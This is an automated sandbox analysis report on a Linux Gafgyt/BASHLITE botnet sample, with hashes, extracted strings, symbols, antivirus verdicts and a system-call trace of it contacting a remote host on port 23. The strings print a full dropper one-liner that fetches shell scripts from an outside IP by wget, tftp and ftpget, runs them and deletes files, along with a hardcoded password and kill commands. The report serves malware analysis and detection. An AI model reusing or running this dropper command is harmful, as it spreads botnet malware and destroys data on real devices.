Report #11627

Binary
ABI: ELFOSABI_SYSV
Size: 93.40KB
Type: ET_EXEC
trid: 50.1% ELF Executable and Linkable format; 49.8% ELF Executable and Linkable format
type: ELF
Wordsize: 32
Architecture: x86
Hashes
md5: c139cec1081a50867d295ef95daf4098
sha1: ed415cd3293827e3f634ba8f332c95b1c320ec3e
crc32: 0x407573ae
sha224: 0cb2bb235281d047c6c96de0cc790fcbe6dbbb1fe931686fbea902b7
sha256: 7dc750aa068b728dc3bc16a44c38f49073d5c675fd832afc3396f3a912a9e0b6
sha384: 204744f4afb852d4a4fa999e091e82995fdd1ea9c44695965caf84cb8335c54b15678c1b66341cbfd886d61cab72d776
sha512: 89b18f9b9acc11b6156a61d698ad7fe6e0ebf24da5d563d3ee9c051603e0f084c029ad33bbf5d5cdecc7e19932d1f7b9d6c43160df0b3e0cbd19dd6e9143a28c
ssdeep: 1536:KSujS3LhdjFjZNWvsRPtlV6sLbp+c2SC10Nllf21tRxGamvcajVmQQoa:n3Lhdj8URPtv6sLblc1WURxPmvcaxmQE
Community
Google: False
HashLib: False
YARA
Matches: maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf
Suspicious: True

Dwarf
List: (empty)
Number: 0
Files
Sys: (empty)
Home: (empty)
Proc: /proc/net/route
Password: (empty)
Suspicious: True
Flags
Flags: 0
Packer
List: None
Packed: False
Network
IPs:
27.118.21.217:23, Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41, cd /tmp || cd /var/run || rm -f *; wget http://27.118.21.217/sc.sh; busybox wget http://27.118.21.217/sc.sh; chmod 777 sc.sh; sh sc.sh; tftp 27.118.21.217 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 27.118.21.217; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 27.118.21.217 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sc.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
URLs:
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex), AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k), AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan), AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr), AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication), AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout), AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23), AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver), AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k), magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net), Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+), MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+), MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html), cd /tmp || cd /var/run || rm -f *; wget http://27.118.21.217/sc.sh; busybox wget http://27.118.21.217/sc.sh; chmod 777 sc.sh; sh sc.sh; tftp 27.118.21.217 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 27.118.21.217; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 27.118.21.217 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sc.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
Mails: (empty)
Suspicious: True
Strings
List
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
cd /tmp || cd /var/run || rm -f *; wget http://27.118.21.217/sc.sh; busybox wget http://27.118.21.217/sc.sh; chmod 777 sc.sh; sh sc.sh; tftp 27.118.21.217 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 27.118.21.217; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 27.118.21.217 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sc.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
27.118.21.217:23
%s %s HTTP/1.1
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
User-Agent: %s
pkill -9 %s
Network is down
Machine is not on the network
No route to host
Host is down
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
been_there_done_that.3001
been_there_done_that
_fwrite.c
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
open.c
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
Remote address changed
No such device or address
Operation now in progress
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Connection reset by peer
Is a named type file
Link has been severed
Too many links
Too many open files
Too many open files in system
pass
No such device
Object is remote
REPORT %s:%s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
>%s.t && cd %s ; >retrieve
Operation not permitted
Connection: %s
8.8.8.8
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
__GI_execve
__register_frame_info_bases
chroot.c
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
gethostbyname.c
gethostbyname_r
socket_connect
opennameservers.c
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
read_etc_hosts_r.c
__socketcall.c
fflush_unlocked
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
socket.c
__nameservers
__read_etc_hosts_r
__open_etc_hosts
__get_hosts_byname_r
admin1234
__GI_socket
sleep.c
sendHTTP

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, a.c, c, Q, i.4251, printchar, prints, printi, print, fdopen_pids, hextable, C.379.6345, C.378.6344, C.377.6343, C.391.6402, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, chroot.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getppid.c, getrlimit.c, ioctl.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, snprintf.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strcasestr.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, 
sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, kill.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, chroot, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, recv, connect, __encode_question, __GI___uClibc_fini, numpids, __encode_header, __GI_strncat, sigemptyset, 
__pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_snprintf, __GI_vsnprintf, __GI_setsid, memmove, __bsd_signal, snprintf, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, read_until_response, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, udp, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, reset_telstate, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, __resolv_lock, kill, 
fputs_unlocked, __pthread_mutex_trylock, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, __GI_memmove, sendSTD, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, tmpdirs, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, __GI___h_errno_location, __GI_memcpy, strcoll, tcp, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, RemoveTMP, __C_ctype_toupper, __GI___C_ctype_b, __GI_gethostbyname_r, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __stdio_rfill, strncat, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, ssh, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, _pthread_cleanup_push_defer, index, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, inet_ntoa, getppid, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, botkiller, strcmp, advances2, __nameserver, data_start, __GI_sysconf, __h_errno_location, matchPrompt, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, 
advance_state, _fini, __GI_chdir, __vfork, __GI_mmap, contains_success, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __decode_answer, __GI_signal, stderr, fails, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __libc_fork, __atexit_lock, scanPid, rand_cmwc, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, _errno, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, tel, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, readUntil, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, mainCommSock, pids, strpbrk, _load_inttype, raise, useragents, free, sigprocmask, getsockname
Number: 745
Reason: None
Suspicious: False
Version
Version: EV_CURRENT
Foremost
Matches: None
Suspicious: False
Sections
List: , .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number: 16
Suspicious: False
Segments
Number: 3
Suspicious: False
Compilers
List: GCC: (GNU) 4.1.2 (every entry in the list is identical)
Identified: 166
Suspicious: True
Functions
List: the same names as the Symbols list above (the report repeats that list here with an empty field after every entry)
Present: True
Anti-Debug
Ptrace: False
Anti-disasm: False
Entry Point
Address: 0x8048168
Suspicious: False
Embedded ELF
List: None
Identified: 0
Program Header
Size: 32
Number: 3
Offset: 52
Section Header
Size: 40
Number: 16
Offset: 74108
AVclass
gafgyt: 1
VirusTotal
md5: c139cec1081a50867d295ef95daf4098
sha1: ed415cd3293827e3f634ba8f332c95b1c320ec3e
SCANS (DETECTION RATE = 69.49%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20200609
version: 18.4.3895.0
detected: True

MAX
result: malware (ai score=100)
update: 20200609
version: 2019.9.16.1
detected: True

Bkav
update: 20200609
version: 1.3.0.9899
detected: False

K7GW
update: 20200609
version: 11.114.34346
detected: False

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 1.1.1.5
detected: True

Avast
result: ELF:DDoS-Y [Trj]
update: 20200609
version: 18.4.3895.0
detected: True

Avira
result: LINUX/Gafgyt.iqwaf
update: 20200609
version: 8.3.3.8
detected: True

Baidu
update: 20190318
version: 1.0.0.2
detected: False

Cyren
result: ELF/Gafgyt.C.gen!Camelot
update: 20200609
version: 6.3.0.2
detected: True

DrWeb
result: Linux.BackDoor.Fgt.206
update: 20200608
version: 7.0.46.3050
detected: True

GData
result: Linux.Trojan-DDoS.Lightaidra.A
update: 20200609
version: A:25.25872B:27.19027
detected: True

Panda
update: 20200608
version: 4.6.4.2
detected: False

VBA32
update: 20200608
version: 4.4.1
detected: False

VIPRE
update: 20200609
version: 84336
detected: False

Zoner
update: 20200609
version: 0.0.0.0
detected: False

ClamAV
result: Unix.Trojan.Mirai-5607483-0
update: 20200608
version: 0.102.3.0
detected: True

Comodo
update: 20200609
version: 32518
detected: False

F-Prot
update: 20200609
version: 4.7.1.166
detected: False

Ikarus
result: Trojan.Linux.Gafgyt
update: 20200608
version: 0.1.5.2
detected: True

McAfee
result: RDN/Generic BackDoor.un
update: 20200609
version: 6.0.6.653
detected: True

Rising
result: Backdoor.Gafgyt!8.56E (TFE:14:SRT60T0wHHI)
update: 20200609
version: 25.0.0.25
detected: True

Sophos
result: Linux/DDoS-BI
update: 20200609
version: 4.98.0
detected: True

Yandex
update: 20200608
version: 5.5.2.24
detected: False

Zillya
result: Backdoor.Gafgyt.Linux.12303
update: 20200606
version: 2.0.0.4105
detected: True

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 1.0.0.875
detected: True

FireEye
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 32.31.0.0
detected: True

Sangfor
result: Malware
update: 20200423
version: 1.0
detected: True

TACHYON
update: 20200609
version: 2020-06-09.02
detected: False

Tencent
result: Trojan.Linux.Gafgyt.bbaa
update: 20200609
version: 1.0.0.1
detected: True

ViRobot
update: 20200609
version: 2014.3.20.0
detected: False

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 3.0.5.370
detected: True

AegisLab
result: Trojan.Linux.Generic.m!c
update: 20200609
version: 4.2
detected: True

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20200605
version: 2018.12.0.1641
detected: True

F-Secure
result: Malware.LINUX/Gafgyt.iqwaf
update: 20200609
version: 12.0.86.52
detected: True

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20200609
version: 6.2.142.0
detected: True

Jiangmin
result: Backdoor.Linux.evz
update: 20200609
version: 16.0.100
detected: True

Kingsoft
update: 20200609
version: 2013.8.14.323
detected: False

Symantec
result: Trojan.Gen.NPE
update: 20200609
version: 1.11.0.0
detected: True

AhnLab-V3
result: Linux/Gafgyt.Gen14
update: 20200609
version: 3.17.6.27456
detected: True

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.az
update: 20200609
version: 3.0.0.1
detected: True

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.az
update: 20200609
version: 15.0.1.13
detected: True

Microsoft
result: DDoS:Linux/Lightaidra!rfn
update: 20200609
version: 1.1.17100.2
detected: True

Qihoo-360
result: Linux/Backdoor.e06
update: 20200609
version: 1.0.0.1120
detected: True

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.az
update: 20200609
version: 1.0
detected: True

ESET-NOD32
result: a variant of Linux/Gafgyt.QW
update: 20200609
version: 21462
detected: True

TrendMicro
result: Backdoor.Linux.BASHLITE.SMJC
update: 20200609
version: 11.0.0.1006
detected: True

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 7.2
detected: True

K7AntiVirus
update: 20200609
version: 11.114.34344
detected: False

SentinelOne
result: DFI - Malicious ELF
update: 20200601
version: 4.3.0.105
detected: True

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20200609
version: 200609-00
detected: True

Malwarebytes
update: 20200609
version: 3.6.4.335
detected: False

TotalDefense
update: 20200601
version: 37.1.62.1
detected: False

CAT-QuickHeal
update: 20200609
version: 14.00
detected: False

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eqlxkn
update: 20200609
version: 1.0.134.25119
detected: True

BitDefenderTheta
result: Gen:NN.Mirai.34126
update: 20200603
version: 7.2.37796.0
detected: True

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20200609
version: 14.0.409.0
detected: True

SUPERAntiSpyware
update: 20200606
version: 5.6.0.1032
detected: False

McAfee-GW-Edition
result: RDN/Generic BackDoor.un
update: 20200609
version: v2017.3010
detected: True

TrendMicro-HouseCall
result: Backdoor.Linux.BASHLITE.SMJC
update: 20200609
version: 10.0.0.1040
detected: True

total
59
sha256
7dc750aa068b728dc3bc16a44c38f49073d5c675fd832afc3396f3a912a9e0b6
scan_id
7dc750aa068b728dc3bc16a44c38f49073d5c675fd832afc3396f3a912a9e0b6-1591686562
resource
c139cec1081a50867d295ef95daf4098
positives
41
scan_date
2020-06-09 07:09:22
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291 execve("./malware", ["./malware"], [/* 15 vars */]) = 0
4291 ioctl(0, TCGETS, 0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device)
4291 ioctl(1, TCGETS, 0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device)
4291 prctl(PR_SET_NAME, "cron\0PING\0DUP\0 \0") = 0
4291 time(NULL) = 1571351692
4291 getpid() = 4291
4291 time(NULL) = 1571351692
4291 getpid() = 4291
4291 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3
4291 connect(3, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
4291 getsockname(3, {sa_family=AF_INET, sin_port=htons(54082), sin_addr=inet_addr("192.168.122.147")}, [16]) = 0
4291 open("/proc/net/route", O_RDONLY) = 4
[256 single-byte read(4, ..., 1) = 1 calls: /proc/net/route is read one character at a time. The data read is the header line (Iface, Destination, Gateway, Flags, RefCnt, Use, Metric, Mask, MTU, Window, IRTT) followed by one route entry: ens3 00000000 017AA8C0 0003 0 0 100 00000000 0 0 0, i.e. a default route via gateway 192.168.122.1 on interface ens3.]
4291 close(4) = 0
4291 ioctl(3, SIOCGIFHWADDR, {ifr_name="ens3", ifr_hwaddr=52:54:00:94:44:aa}) = 0
4291 close(3) = 0
4291 fork() = 4292
4291 wait4(4292, <unfinished ...>
4292 fork() = 4293
4292 exit(0) = ?
4291 <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 4292
4291 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4292, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
4291 exit(0) = ?
4293 setsid() = 4293
4293 chroot("/") = -1 EPERM (Operation not permitted)
4293 chdir("/") = 0
4293 rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x805216f}, {SIG_DFL, [], 0}, 8) = 0
4293 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4293 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4293 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4293 connect(3, {sa_family=AF_INET, sin_port=htons(23), sin_addr=inet_addr("27.118.21.217")}, 16) = -1 EINPROGRESS (Operation now in progress)
4293 _newselect(4, NULL, [3], NULL) = 0 (Timeout)
4293 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4293 rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
4293 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
4293 nanosleep({5, 1571351692}, 0xfffbfe24) = 0
4293 close(3) = 0
4293 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4293 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4293 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4293 connect(3, {sa_family=AF_INET, sin_port=htons(23), sin_addr=inet_addr("27.118.21.217")}, 16) = -1 EINPROGRESS (Operation now in progress)
4293 _newselect(4, NULL, [3], NULL, {30, 8}

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True

DNS
Query

Response

TCP
Info
localhost:47040 -> 27.118.21.217:23
localhost:47038 -> 27.118.21.217:23

UDP
Info
localhost:5353 -> 224.0.0.251:5353

HTTP
Info

Summary
DNS
False

TCP
True

UDP
True

HTTP
False

Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True